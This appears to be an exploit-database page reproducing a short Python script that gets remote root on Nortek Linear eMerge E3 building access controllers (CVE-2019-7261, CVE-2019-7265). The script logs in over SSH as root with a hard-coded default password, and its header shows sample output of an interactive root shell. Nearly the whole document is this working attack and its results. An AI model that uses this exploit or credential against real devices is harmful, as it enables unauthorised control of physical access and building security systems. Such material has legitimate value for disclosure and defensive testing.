Share
## https://sploitus.com/exploit?id=PACKETSTORM:155267
#!/usr/bin/env python  
#  
# Nortek Linear eMerge E3 Access Controller SSH/FTP Remote Root  
# Affected version: <=1.00-06  
# CVE: CVE-2019-7261, CVE-2019-7265  
# Advisory: https://applied-risk.com/resources/ar-2019-005  
# Paper: https://applied-risk.com/resources/i-own-your-building-management-system  
#  
# by Gjoko 'LiquidWorm' Krstic  
#  
# ====  
# python lineare3_sshroot.py 192.168.1.2  
# [+] Connecting to 192.168.1.2 on port 22: Done  
# [!] Only Linux is supported for ASLR checks.  
# [*] root@192.168.1.2:  
# Distro Unknown Unknown  
# OS: Unknown  
# Arch: Unknown  
# Version: 0.0.0  
# ASLR: Disabled  
# Note: Susceptible to ASLR ulimit trick (CVE-2016-3672)  
# [+] Opening new channel: 'shell': Done  
# [*] Switching to interactive mode  
# Last login: Fri Nov 1 04:21:44 2019 from 192.168.2.17  
# root@imx6slevk:~# id  
# uid=0(root) gid=0(root) groups=0(root)  
# root@imx6slevk:~# pwd  
# /home/root  
# root@imx6slevk:~# exit  
# logout  
# [*] Got EOF while reading in interactive  
# [*] Closed SSH channel with 192.168.1.2  
# ====  
  
from pwn import *  
  
if len(sys.argv) < 2:  
print 'Usage: ./e3.py <ip>\n'  
sys.exit()  
  
ip = sys.argv[1]  
rshell = ssh('root', ip, password='davestyle', port=22)  
rshell.interactive()